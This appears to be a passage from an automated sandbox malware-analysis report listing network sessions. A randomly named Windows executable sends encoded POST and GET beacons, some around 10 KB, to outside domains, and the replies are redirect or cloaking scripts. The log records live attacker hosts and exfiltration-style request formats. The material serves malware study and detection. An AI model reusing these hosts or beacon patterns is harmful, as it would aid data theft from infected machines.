                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      41192.168.2.450049193.180.209.15804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:16.869918108 CET708OUTPOST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 73 45 35 64 54 45 63 47 72 67 68 55 4d 73 6f 4a 63 49 4d 38 7a 74 30 44 36 6d 62 4d 55 6f 69 2b 6a 6f 59 2f 4e 67 33 43 34 78 6e 52 4c 64 78 72 75 73 52 65 72 65 45 33 2b 64 32 36 4e 65 4a 31 62 6c 52 78 37 62 79 57 5a 42 61 57 37 4f 30 36 68 31 55 76 38 43 39 49 65 41 78 54 66 4b 32 62 4f 2f 71 36 65 54 46 7a 41 76 50 70 69 63 42 30 63 31 41 37 42 64 30 61 4f 33 6c 73 55 61 38 45 30 74 32 54 46 6a 68 4d 4f 75 4a 63 4f 4d 65 30 64 55 57 35 34 2f 33 75 30 71 57 2b 41 5a 56 4e 48 69 46 69 71 31 65 46 50 47 64 6f 63 32 4b 52 31 48 74 71 7a 67 3d 3d
                                                                                                                                      Data Ascii: sTS=hhhof8OBXTnfsE5dTEcGrghUMsoJcIM8zt0D6mbMUoi+joY/Ng3C4xnRLdxrusRereE3+d26NeJ1blRx7byWZBaW7O06h1Uv8C9IeAxTfK2bO/q6eTFzAvPpicB0c1A7Bd0aO3lsUa8E0t2TFjhMOuJcOMe0dUW54/3u0qW+AZVNHiFiq1eFPGdoc2KR1Htqzg==
                                                                                                                                      Jan 11, 2025 09:39:17.513962984 CET729INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 499
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:08 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      42192.168.2.450050193.180.209.15804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:19.451745987 CET728OUTPOST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 47 2b 6a 4a 6f 2f 66 30 6a 43 39 78 6e 52 54 4e 78 55 71 73 52 76 72 65 59 46 2b 63 4b 36 4e 65 74 31 62 6e 4a 78 37 71 79 56 44 78 61 55 77 75 30 38 2b 6c 55 76 38 43 39 49 65 41 6b 2b 66 4b 75 62 4f 4d 69 36 4d 68 39 77 44 76 50 75 79 4d 42 30 57 56 41 2f 42 64 30 6f 4f 79 39 43 55 59 30 45 30 73 47 54 47 33 56 50 42 75 4a 65 54 63 66 7a 52 6d 48 38 30 64 75 6d 36 59 50 66 4a 36 6c 58 47 6b 49 34 37 45 2f 53 64 47 35 62 42 78 44 6c 34 45 51 6a 6f 72 41 63 39 75 43 32 70 39 57 58 67 7a 43 34 65 45 62 6b 5a 63 55 3d
                                                                                                                                      Data Ascii: sTS=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbG+jJo/f0jC9xnRTNxUqsRvreYF+cK6Net1bnJx7qyVDxaUwu08+lUv8C9IeAk+fKubOMi6Mh9wDvPuyMB0WVA/Bd0oOy9CUY0E0sGTG3VPBuJeTcfzRmH80dum6YPfJ6lXGkI47E/SdG5bBxDl4EQjorAc9uC2p9WXgzC4eEbkZcU=
                                                                                                                                      Jan 11, 2025 09:39:20.076097965 CET729INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 498
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:10 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      43192.168.2.450051193.180.209.15804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:22.018497944 CET10810OUTPOST /plc2/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.fengzheng.shop
                                                                                                                                      Referer: http://www.fengzheng.shop/plc2/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 4f 2b 6a 62 67 2f 4e 46 6a 43 2b 78 6e 52 61 74 78 52 71 73 52 49 72 65 42 4d 2b 63 47 45 4e 63 46 31 4b 30 42 78 79 34 61 56 4e 42 61 55 2f 4f 30 39 68 31 55 6d 38 43 73 42 65 41 30 2b 66 4b 75 62 4f 4e 79 36 62 6a 46 77 4d 50 50 70 69 63 41 67 63 31 41 48 42 64 73 53 4f 7a 4a 38 56 73 41 45 31 4d 57 54 4a 6b 39 50 49 75 4a 59 53 63 66 52 52 6d 4c 33 30 64 79 41 36 5a 36 4b 4a 39 56 58 47 42 68 64 6d 57 44 45 4b 32 64 34 57 53 2f 30 36 57 31 67 6e 34 63 6e 32 2b 57 4b 32 2b 4f 70 75 54 54 78 43 6b 76 76 4b 72 31 4f 2f 77 48 34 44 4d 4f 55 5a 78 61 31 59 38 33 6e 59 33 68 71 51 39 5a 69 77 69 43 62 76 57 65 2f 48 6b 74 4d 47 44 4c 5a 56 4c 63 62 62 4a 37 70 56 6e 2f 45 39 43 53 65 78 55 6a 77 74 30 4f 61 6f 71 32 5a 46 4c 2b 6a 61 74 48 78 38 4f 38 56 4c 55 66 48 47 68 43 55 68 30 75 4e 63 53 4a 42 56 7a 54 6c 6d 35 71 77 30 46 6a 37 41 36 65 45 65 46 53 74 6a 4b [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbO+jbg/NFjC+xnRatxRqsRIreBM+cGENcF1K0Bxy4aVNBaU/O09h1Um8CsBeA0+fKubONy6bjFwMPPpicAgc1AHBdsSOzJ8VsAE1MWTJk9PIuJYScfRRmL30dyA6Z6KJ9VXGBhdmWDEK2d4WS/06W1gn4cn2+WK2+OpuTTxCkvvKr1O/wH4DMOUZxa1Y83nY3hqQ9ZiwiCbvWe/HktMGDLZVLcbbJ7pVn/E9CSexUjwt0Oaoq2ZFL+jatHx8O8VLUfHGhCUh0uNcSJBVzTlm5qw0Fj7A6eEeFStjKh4NrvDh3gEhGLHGvSj66oMhHmqgEVB7xf5p6qIJc9E8QfkuUX/wdamj0W4SPPQEzLqJJaOp0AfPZtdiRHYlzleQ+kEvImqQ2hwWb2MkhaqEb45l6TaW4zcA2wNBzzOzy/Ngybi+Tn1H53rupodqjlXCzbPLf3N4Hxje65+uQCO+Z6w5m6BQ5n50whhHF/Rcllyxum0IE+Ioa3vd92Ckw8WQ2j9gfkJmuGl1cUEjA3EZjr01f4/8yasOvT5meHtrswnt7NtW4OBPMT3VNGRCtDeVPDoKLA1eGGcQwjoshupIFubjFJ/ofucuhnziJ9KmTDtg2s7ptVRm/sruWNRd6lzVcH/mdcNsYcKMSxj2zraKXNtjBRitOIWwu7AF5hH/YevfcGD2bmkd/AL75aj86ocuI5BbXLYHWl1cR65jx5qgsMsPlvIVjybwW1uvj7AmHs5kZaUKpyqrv2NFKzax+3sillhYKRfdWhM+LMMb/8lOzajI7zjih0Il5tRVzpiV9chAEV+boYixxEF6kB/6ZxRJ7pUtL2UAn6eMCtrC8KbLIdYolX3hO4l3Wc/VdqYSO7EWYLRaVSHIyoDD3SurGPlawpGiaNjgjvMF6BTvx/Mxl03+8khjwiTqSmbuRlSd7BO5snxQO8siSfTmRLLOrYXElca2V1ZwdUm [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:39:22.623862982 CET729INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 497
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:13 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      44192.168.2.450052193.180.209.15804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:24.570935011 CET441OUTGET /plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.fengzheng.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:39:25.214323044 CET729INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                                                                                                                      X-Ratelimit-Limit: 500
                                                                                                                                      X-Ratelimit-Remaining: 496
                                                                                                                                      X-Ratelimit-Reset: 1736588348
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:16 GMT
                                                                                                                                      Content-Length: 458
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                                                                                      Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      45192.168.2.450053208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:30.491816998 CET729OUTPOST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 79 68 50 77 73 34 33 30 6b 6d 77 6b 75 4e 36 76 33 4a 58 70 79 77 4e 42 43 53 59 31 66 6c 69 36 72 53 73 67 2b 36 44 65 53 33 31 65 57 75 45 46 44 36 32 55 2f 45 74 46 48 48 47 78 64 62 5a 74 6b 71 4c 74 56 4f 42 6a 7a 33 4c 6b 72 75 31 5a 43 52 73 6a 30 73 43 73 79 59 43 6f 50 35 58 6c 64 6b 2f 2f 58 42 4c 63 4d 77 77 7a 71 79 70 43 43 45 4b 4d 30 64 2b 48 59 51 76 4e 71 4a 6c 41 4e 6b 34 37 77 66 65 45 77 73 4c 32 53 55 41 62 54 49 7a 6d 73 42 73 79 6a 65 46 33 63 6e 2b 4b 70 65 4c 6d 6e 35 6a 58 6c 55 41 74 68 4f 6a 4b 4f 68 77 42 57 6c 34 46 4e 37 2f 68 4b 4a 45 75 72 41 3d 3d
                                                                                                                                      Data Ascii: sTS=yhPws430kmwkuN6v3JXpywNBCSY1fli6rSsg+6DeS31eWuEFD62U/EtFHHGxdbZtkqLtVOBjz3Lkru1ZCRsj0sCsyYCoP5Xldk//XBLcMwwzqypCCEKM0d+HYQvNqJlANk47wfeEwsL2SUAbTIzmsBsyjeF3cn+KpeLmn5jXlUAthOjKOhwBWl4FN7/hKJEurA==


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      46192.168.2.450054208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:33.043699980 CET749OUTPOST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 79 68 50 77 73 34 33 30 6b 6d 77 6b 75 74 71 76 77 71 2f 70 6e 67 4e 43 4d 79 59 31 51 46 69 2b 72 53 51 67 2b 37 47 46 52 46 42 65 57 4e 51 46 41 37 32 55 2b 45 74 46 4d 6e 47 30 54 37 59 41 6b 71 48 6c 56 50 74 6a 7a 33 66 6b 72 72 4a 5a 43 6d 34 6b 31 38 43 75 6d 6f 43 71 4c 35 58 6c 64 6b 2f 2f 58 46 72 32 4d 30 55 7a 71 6a 35 43 41 6c 4b 4e 72 74 2b 41 4a 51 76 4e 67 5a 6c 4d 4e 6b 35 59 77 65 53 75 77 76 7a 32 53 57 59 62 54 5a 7a 70 6c 42 73 30 6e 65 45 59 66 30 58 68 6d 2b 71 50 71 6f 6a 57 71 51 31 42 74 6f 75 51 66 51 52 57 45 6c 63 32 51 38 32 56 48 4b 35 6e 77 43 4a 5a 31 4c 49 64 39 73 46 53 63 52 67 5a 42 42 52 46 77 35 34 3d
                                                                                                                                      Data Ascii: sTS=yhPws430kmwkutqvwq/pngNCMyY1QFi+rSQg+7GFRFBeWNQFA72U+EtFMnG0T7YAkqHlVPtjz3fkrrJZCm4k18CumoCqL5Xldk//XFr2M0Uzqj5CAlKNrt+AJQvNgZlMNk5YweSuwvz2SWYbTZzplBs0neEYf0Xhm+qPqojWqQ1BtouQfQRWElc2Q82VHK5nwCJZ1LId9sFScRgZBBRFw54=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      47192.168.2.450055208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:35.587279081 CET10831OUTPOST /9pyp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.joeltcarpenter.online
                                                                                                                                      Referer: http://www.joeltcarpenter.online/9pyp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 79 68 50 77 73 34 33 30 6b 6d 77 6b 75 74 71 76 77 71 2f 70 6e 67 4e 43 4d 79 59 31 51 46 69 2b 72 53 51 67 2b 37 47 46 52 46 5a 65 57 39 4d 46 47 6f 65 55 73 55 74 46 46 48 47 31 54 37 5a 43 6b 70 33 66 56 4f 52 7a 7a 31 6e 6b 35 35 78 5a 4b 7a 55 6b 37 38 43 75 35 34 43 72 50 35 57 2f 64 6e 48 6a 58 42 48 32 4d 30 55 7a 71 67 78 43 45 30 4b 4e 34 39 2b 48 59 51 76 6f 71 4a 6b 62 4e 6b 68 6d 77 65 47 55 77 66 54 32 53 32 49 62 52 72 4c 70 75 42 73 32 67 65 45 41 66 30 4c 2b 6d 39 4f 6c 71 6f 57 7a 71 58 64 42 2b 65 2b 4c 44 54 42 74 46 6d 68 6f 45 50 61 67 4f 4b 68 56 38 43 4e 47 6a 5a 30 54 70 73 51 38 62 42 74 4b 45 44 68 78 6b 65 55 5a 66 63 51 53 69 61 52 39 65 4b 37 61 55 45 35 6e 6d 4e 53 48 41 6a 62 47 45 2f 46 73 70 75 73 43 56 65 31 6a 62 77 6f 6e 68 37 33 72 64 4c 76 67 6d 77 42 4d 35 4e 6f 39 39 69 58 4c 39 68 75 67 44 37 6d 6e 39 42 32 30 6e 52 70 47 56 4c 6e 69 4c 35 2f 6b 4d 48 79 62 6a 59 37 74 75 75 69 5a 6f 6f 66 36 39 73 42 61 4a 7a 66 7a 4f 54 4a 64 44 78 6f 54 57 38 [TRUNCATED]
